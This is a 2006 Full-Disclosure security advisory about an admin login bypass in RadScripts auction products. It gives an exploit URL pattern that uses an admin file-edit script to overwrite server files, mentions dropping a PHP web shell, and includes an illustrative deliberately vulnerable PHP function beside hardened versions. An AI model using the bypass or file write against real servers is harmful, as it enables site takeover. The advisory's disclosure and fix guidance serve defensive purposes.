[Full-disclosure] RadBids Gold, RadLance Gold, RadNics Gold auction products: Admin bypass vulnerability
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] RadBids Gold, RadLance Gold, RadNics Gold auction products: Admin bypass vulnerability
- From: "Duke" <vuln.invent@xxxxxxxxx>
- Date: Mon, 24 Jul 2006 14:03:34 +0700
Products: RadBids Gold, RadLance Gold, RadNics Gold auction products
Vendor: RadScripts
URL: http://www.radscripts.com/
VULNERABILITY CLASS: Admin login bypass
[Product Description]
RadBids was designed to give you all the tools needed to rapidly deploy an eBay-style auction web site solution. Our PHP auction software is simple to deploy and easy to manage. From a web-based administrative panel one can manage all aspects of the auction software, including categories, users, financial transactions and every aspect of the auction software, with a few clicks of the mouse.
[Summary]
An attacker can bypass the admin login of the RadScripts auction software by requesting the admin scripts directly by URL.
[Exploit]
http://target.xxx/[product_home]/admin/a_[admin_action_file]
For example:
http://target.xxx/[product_home]/admin/a_editpage.php?filename=[arbitrary_file]
This can be used to overwrite any file on the server that is writable by the web server process, for example to upload a PHP web shell.
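The two defects the advisory describes (admin scripts that run without checking for a logged-in administrator, and a filename parameter that is used as a write path) are shown below as an added illustration with one way to close each of them. This is not code from the advisory or from RadScripts; the file name admin_auth.php, the session key $_SESSION['admin_id'], the pages/ directory and the function names are assumptions made for the example.

```php
<?php
// Added illustration, not RadScripts code. admin_auth.php, $_SESSION['admin_id']
// and the pages/ directory are assumed names, not identifiers from the product.

// --- Vulnerable shape: an admin script reachable at /admin/a_editpage.php that
// trusts whoever requests it and writes wherever ?filename= points.
function vulnerable_editpage(array $get, array $post): void
{
    // No authentication check and no restriction on the path: any request can
    // write to any location the web server process may write to.
    $path = __DIR__ . '/../' . $get['filename'];
    file_put_contents($path, $post['content']);
}

// --- Hardened shape, part 1: a guard that every a_*.php includes as its first
// statement (the assumed admin_auth.php). Without a valid admin session the
// script stops before doing anything else.
function require_admin_session(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['admin_id'])) {
        http_response_code(403);
        exit('Admin login required');
    }
}

// --- Hardened shape, part 2: accept only a bare file name with a permitted
// extension, and confirm the resolved location still lies inside one fixed
// directory. Returns null for anything that should not be written.
function resolve_editable_page(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Bare name, no directory separators, no .php: rejects traversal,
    // absolute paths and attempts to drop executable code.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.(html|txt)\z/', $requested)) {
        return null;
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $requested;
    // Defence in depth: the regex already forbids separators, but also verify
    // that the directory the file would land in is $base itself.
    $parent = realpath(dirname($candidate));
    if ($parent === false || $parent !== $base) {
        return null;
    }
    return $candidate;
}

function hardened_editpage(array $get, array $post): void
{
    require_admin_session();
    $target = resolve_editable_page(__DIR__ . '/../pages', $get['filename'] ?? '');
    if ($target === null) {
        http_response_code(400);
        exit('Invalid page name');
    }
    file_put_contents($target, $post['content'] ?? '');
}
```

The session guard is the fix for the bypass itself: a login form that sets a session flag is worthless if the individual admin scripts never read it, so the check has to run unconditionally at the top of every file under admin/, not only on the login page. The path restriction is independent of the login and matters even for genuine administrators, since an authenticated account that can write arbitrary files is still a full server compromise waiting on a weak password. Where the application cannot be patched immediately, restricting the admin/ directory at the web server (HTTP authentication or a source-address allow list) removes the direct-URL path until it can be.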
[Credits]
INVENT
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/